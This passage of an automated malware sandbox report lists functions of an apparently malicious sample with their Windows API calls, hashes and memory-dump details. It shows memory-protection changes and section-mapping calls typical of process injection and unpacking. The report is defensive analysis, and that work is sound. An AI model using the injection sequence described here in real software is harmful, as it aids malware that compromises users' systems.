Opcode ID: 0c7ca108b8e1f9837bab8f0d1351edd7a41117851920c5af44396fde0a8b5c73
Instruction ID: d67ab6015398af25ee4ccbcaa24419cc1747ddacc62f126d36a823bcbb263e11
Opcode Fuzzy Hash: 0c7ca108b8e1f9837bab8f0d1351edd7a41117851920c5af44396fde0a8b5c73
Instruction Fuzzy Hash: 81313E20A5B680CBF301CB78F8047823B62BB65744F548479D5498B3A5EBBA4534E7EF

Function 004157E0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(02B18CE8), ref: 004158BF
GetProcAddress.KERNEL32(00000000,0041ACD0), ref: 004158FC
VirtualProtect.KERNELBASE(02B18B2C,02B18CE4,00000040,?), ref: 0041591B

Strings

, xrefs: 00415825

Memory Dump Source

Source File: 00000000.00000002.1817408197.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_file.jbxd

Similarity

API ID: AddressHandleModuleProcProtectVirtual
String ID:
API String ID: 2099061454-3916222277
Opcode ID: 84852efa8c03839483d38d8860323c66b107fbe912840dfdb41af03374aacfca
Instruction ID: 391a96fec73ca33ccc7d485fbd88f315141c0e441e0fac2c4929083d5726926d
Opcode Fuzzy Hash: 84852efa8c03839483d38d8860323c66b107fbe912840dfdb41af03374aacfca
Instruction Fuzzy Hash: 64311C20A5B680CBF301CB78F8047923A62BB25744F44857895498B3A5EBBA5534E7EF

Function 02D80E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,02D80223,?,?), ref: 02D80E19
SetErrorMode.KERNELBASE(00000000,?,?,02D80223,?,?), ref: 02D80E1E

Memory Dump Source

Source File: 00000000.00000002.1818600751.0000000002D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d80000_file.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: e137e78b578b6a5f483533a7db217aef9f66ea24294c700cfcf316ed3c75de30
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: C2D0123214512877D7013A94DC09BCE7B1CDF05B67F008011FB0DD9180C770994046E5

Function 004018E6 Relevance: 1.3, APIs: 1, Instructions: 63
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1817377726.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

Function 00401915 Relevance: 1.3, APIs: 1, Instructions: 59
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1817377726.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

Function 004018F1 Relevance: 1.3, APIs: 1, Instructions: 55
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1817377726.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F

Function 00401912 Relevance: 1.3, APIs: 1, Instructions: 52sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1817377726.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F

Function 02DBAAED Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02DBAB3E

Memory Dump Source

Source File: 00000000.00000002.1818742060.0000000002DB7000.00000040.00000020.00020000.00000000.sdmp, Offset: 02DB7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2db7000_file.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: f143fc5c02ddd37e0eb1527502c53b4c792090aed7660466ee145819332fc169
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: BE112779A00208EFDB01DF98C995E99BBF5AF08351F0580A4F9589B362D371EA90DF90

Function 00401925 Relevance: 1.3, APIs: 1, Instructions: 46sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1817377726.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F

Function 004157B0 Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNELBASE(00000000,02B18CE4,00415E4B), ref: 004157B8

Memory Dump Source

Source File: 00000000.00000002.1817408197.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_file.jbxd

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: 74057e30488fa2548e774f69ad24f16fb778dc8554d8f99b62281b18be0c0aab
Instruction ID: 1a08001e757156177e4176ef5c7bf10d863cb70e7c1df62a2ddb33f564a894ee
Opcode Fuzzy Hash: 74057e30488fa2548e774f69ad24f16fb778dc8554d8f99b62281b18be0c0aab
Instruction Fuzzy Hash: 53B092B09822009BE240CBA0A844B513A68B308342F414421F508C6180DA2054208F14

Non-executed Functions

Function 02D8092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

l, xrefs: 02D80966
., xrefs: 02D8095F
GetProcAddress., xrefs: 02D809DC, 02D809DF, 02D809E4

Memory Dump Source

Source File: 00000000.00000002.1818600751.0000000002D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d80000_file.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: 9d161aee42b0abed303ff5aa5651cd11f41ae20b825f0027bc5e713653254f0d
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: E3314AB6900609DFDB10DF99C880AAEBBF9FF48725F19404AD841A7310D771EA49CFA4

Function 02DBA70B Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1818742060.0000000002DB7000.00000040.00000020.00020000.00000000.sdmp, Offset: 02DB7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2db7000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: 4606215b86b38e79a70f774fa23c84c78a1783bd1ab180d3ddd44312b63c7196
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 85117C72344100EFD744DF55DCA0FE673EAEF89260B298065E909CB756E679EC02CB60

Function 00403277 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1817377726.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d637f55854845c17b2ef1889abfa65daee778aef84c81fe99ca145d77efb4ab1
Instruction ID: 8df8bbe6331efc2743c071309605838865bd09ee4bc9229f5037613db63a7100
Opcode Fuzzy Hash: d637f55854845c17b2ef1889abfa65daee778aef84c81fe99ca145d77efb4ab1
Instruction Fuzzy Hash: 3CF0F0A1E2E243AFCA0A1E34A916532AF1C751632372401FFA083752C2E23D0B17619F

Function 0040324F Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1817377726.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e697f2bdb2541e438c090e00759e651186a60c26cca26bbac42aeca89057f02
Instruction ID: 9241026e722b7dd7cbe781a55eac82938fa1721c21c2f19ebd5655df2a8ce19b
Opcode Fuzzy Hash: 2e697f2bdb2541e438c090e00759e651186a60c26cca26bbac42aeca89057f02
Instruction Fuzzy Hash: 90F024A191E281DBCA0E1E2858169327F1C7A5230733405FF9093762C2E13D8B02619F

Function 02D80D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1818600751.0000000002D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d80000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: 194ead901159a628181f825eb44f9653329cd22276f99499c8f77ff8fb7f40a2
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: B701A276A116048FDF21EF24C805BAB33E5FB86317F4584A5D90A97381E774AD49CB90

Function 00403256 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1817377726.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffb84ad0bafd287640d5e2703f1f7dee9546aae40f50b635da61e00f6775f880
Instruction ID: 0b233a05c36d383cd3dc693d5d52553799fa9f094e89171df70cdd77f1a33a14
Opcode Fuzzy Hash: ffb84ad0bafd287640d5e2703f1f7dee9546aae40f50b635da61e00f6775f880
Instruction Fuzzy Hash: 5CF027A1E6E202ABCA0E1E20AD165727F4D651132372401FFA053B63C1E17D4B07619F

Function 00403247 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1817377726.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 675dd5adc9fa045870a710e44379b64774d26f731239f7a86ac84ccf831d603a
Instruction ID: 61f4eeca6a5bdba97633f9ce55ed0ebe4cfc5c7823726c26b0d716f95b27c2a1
Opcode Fuzzy Hash: 675dd5adc9fa045870a710e44379b64774d26f731239f7a86ac84ccf831d603a
Instruction Fuzzy Hash: 1EF027A191E242DBCA0D2E246D158322F4C295530733401FF9053B92C2E03E8B07619F

Function 0040326C Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1817377726.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7491e8d205a9a81a512842342f84d5d05ba67224b994174453f1348fb0568999
Instruction ID: 50319dc6f67c7bb301174255112627998741b5b21f267b3f7f348d4aa007f6d0
Opcode Fuzzy Hash: 7491e8d205a9a81a512842342f84d5d05ba67224b994174453f1348fb0568999
Instruction Fuzzy Hash: A5E068A2D2E2029BCA1E1E206D464333F4C625630B72001FF9053B92C1F03E4B0661DF

Function 00403290 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1817377726.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4880d3875d1ad92a9fbe5811d46a77b3d6ce579c17d5e0502d0cbfecac410ff8
Instruction ID: 65af031b81eeafed772fbc50416c1b4fdc84f259fd59d49ecec168145e9dac47
Opcode Fuzzy Hash: 4880d3875d1ad92a9fbe5811d46a77b3d6ce579c17d5e0502d0cbfecac410ff8
Instruction Fuzzy Hash: 3EE0ED92E6E2854BCAA52E30980A1623F5C69A331A32480FFA002A52D2F03E0F05815B

Function 004159B0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

BuildCommDCBA.KERNEL32(00000000,?), ref: 004159E1
WritePrivateProfileStringA.KERNEL32(00417384,0041735C,00417330,0041730C), ref: 00415A05
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00415A0D
GetNumaAvailableMemoryNode.KERNEL32(00000000,00000000), ref: 00415A4D
GetComputerNameW.KERNEL32(?,?), ref: 00415A61
SetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00415A6F
OpenJobObjectA.KERNEL32(00000000,00000000,004173B4), ref: 00415A7E
GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 00415A8F

Strings

-, xrefs: 00415A9C

Memory Dump Source

Source File: 00000000.00000002.1817408197.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_file.jbxd

Similarity

API ID: Name$AvailableBuildCalendarCommComputerEnvironmentFreeInfoMemoryNodeNumaObjectOpenPathPrivateProfileShortStringStringsWrite
String ID: -
API String ID: 113859268-2547889144
Opcode ID: 14f241474e9e1da913b15f4f6307fbc2b0786e210afcc624a3eb522448752a14
Instruction ID: 11b84fe8b2b04f3d00d3004244583e2a87b640e11e3fb3d6ac6cb40e453acbe7
Opcode Fuzzy Hash: 14f241474e9e1da913b15f4f6307fbc2b0786e210afcc624a3eb522448752a14
Instruction Fuzzy Hash: 7821F731A84308EBD720DF94DC86BD97B70EF4C752F1181AAFA49AA1C0CAB459C4CB59

Function 00415AD0 Relevance: 6.0, APIs: 4, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

QueryDosDeviceW.KERNEL32(00000000,?,00000000), ref: 00415B04
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00415B1F
HeapDestroy.KERNEL32(00000000), ref: 00415B3E
GetNumaHighestNodeNumber.KERNEL32(00000000), ref: 00415B46

Memory Dump Source

Source File: 00000000.00000002.1817408197.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_file.jbxd

Similarity

API ID: DestroyDeviceEnvironmentFreeHeapHighestNodeNumaNumberQueryStrings
String ID:
API String ID: 367530164-0
Opcode ID: c6f65e21e8c25656cd2b46d0446d16c4be618aaecae73d91b7960579b50528bf
Instruction ID: 9b1347604edf95c8b03cd5cfcdcf1f5faacd6efc657b722f8f0869e5d5630474
Opcode Fuzzy Hash: c6f65e21e8c25656cd2b46d0446d16c4be618aaecae73d91b7960579b50528bf
Instruction Fuzzy Hash: 4E01A270A86504DBE650EBA4ED85BDA7BB8F70C346F404037E60A97280DA746D54CB9A

Analysis Process: trbwcitPID: 7852, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	9.4%
Dynamic/Decrypted Code Coverage:	29.4%
Signature Coverage:	0%
Total number of Nodes:	163
Total number of Limit Nodes:	7

Executed Functions

Function 00415B60 Relevance: 44.0, APIs: 23, Strings: 2, Instructions: 283
filelibrarypipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00415C32
ReadConsoleA.KERNEL32(00000000,?,00000000,?,00000000), ref: 00415C4B
FindAtomW.KERNEL32(00000000), ref: 00415C52
SetConsoleMode.KERNEL32(00000000,00000000), ref: 00415C5A
SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00415C72
SetDefaultCommConfigW.KERNEL32(00000000,?,00000000), ref: 00415C99
MoveFileW.KERNEL32(00000000,00000000), ref: 00415CA1
GetVersionExW.KERNEL32(?), ref: 00415CAE
DisconnectNamedPipe.KERNEL32(?), ref: 00415CC1
ReadConsoleOutputW.KERNEL32(00000000,?,?,?,?), ref: 00415D06
GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00415D15
LCMapStringA.KERNEL32(00000000,00000000,004173C0,00000000,?,00000000), ref: 00415D2B
PulseEvent.KERNEL32(00000000), ref: 00415D3B
SetCommState.KERNELBASE(00000000,00000000), ref: 00415D64
GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 00415D95
GetStringTypeExW.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 00415DA6
BuildCommDCBA.KERNEL32(00000000,00000000), ref: 00415DAE
GetTimeFormatW.KERNEL32(00000000,00000000,?,004173EC,?,00000000), ref: 00415DEE
GetFileAttributesA.KERNEL32(00000000), ref: 00415DF5
GetConsoleAliasExesLengthA.KERNEL32 ref: 00415DFB
GetBinaryType.KERNEL32(0041742C,?), ref: 00415E0D
LoadLibraryA.KERNELBASE(00417438), ref: 00415E92

Strings

}$, xrefs: 00415EE7
k`, xrefs: 00415EC3

Memory Dump Source

Source File: 00000005.00000002.2088220630.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40b000_trbwcit.jbxd

Similarity

API ID: Console$CommFile$LengthReadStringType$AliasAliasesAtomAttributesBinaryBuildCompareConfigDefaultDisconnectEventExchangeExesFindFormatInterlockedLibraryLoadModeModuleMoveNameNamedOutputPathPipePulseSearchStateTimeVersion
String ID: k`$}$
API String ID: 2545807588-956986773
Opcode ID: c39809a0e87fd44c053065795a214b46b35c2f87788abebbe67deec486c5fac3
Instruction ID: c6a02c0327a8ca2811bf3dc5f08980216b947ce058d02ad4a82b71acd99ee3cb
Opcode Fuzzy Hash: c39809a0e87fd44c053065795a214b46b35c2f87788abebbe67deec486c5fac3
Instruction Fuzzy Hash: 4FA10271802A24DBC720DB64EC48ADB7B79FF89351F41406AF50AA7150DB385A81CFAD

Function 00401514 Relevance: 10.7, APIs: 7, Instructions: 201
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000005.00000002.2088198793.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_trbwcit.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

Function 004014FE Relevance: 10.7, APIs: 7, Instructions: 180
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000005.00000002.2088198793.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_trbwcit.jbxd

Similarity

API ID: Section$CreateDuplicateObjectView
String ID:
API String ID: 1652636561-0
Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

Function 00401542 Relevance: 10.7, APIs: 7, Instructions: 167
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000005.00000002.2088198793.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_trbwcit.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

Function 00401549 Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000005.00000002.2088198793.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

